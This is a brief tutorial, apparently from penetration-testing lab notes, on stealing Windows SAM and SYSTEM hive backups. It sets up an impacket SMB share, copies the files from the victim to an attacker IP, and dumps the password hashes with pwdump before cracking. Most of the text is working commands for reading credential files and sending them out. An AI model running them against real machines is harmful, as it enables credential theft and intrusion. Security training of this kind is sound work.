In this section we will learn how to exploit insecure SAM file.

Now, Let’s start.

cd c:\windows\repair

Untitled

Please notice that we found the SAM and System files.

Now, let’s transfer the files to the attacker machine.

  1. Open SMBServer on our machine.
impacket-smbserver rem01x `pwd`
  1. on the victim machine.
copy C:\Windows\Repair\SAM \\10.8.44.22\rem01x\
copy C:\Windows\Repair\SYSTEM \\10.8.44.22\rem01x\

Untitled

Now, Let’s go to our attacker machine.

Untitled

Now, we have the files.

 python3 creddump7/pwdump.py SYSTEM SAM

Untitled

Now, Let’s crack the hash.